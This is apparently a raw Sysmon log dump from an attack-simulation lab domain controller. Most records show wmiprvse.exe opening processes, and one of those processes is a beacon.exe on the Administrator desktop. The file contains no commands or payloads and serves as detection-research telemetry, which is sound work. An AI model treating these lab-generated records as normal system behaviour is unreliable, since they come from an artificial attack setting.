Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.512{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324\PSHost.132591775723693986.7324.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.512{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 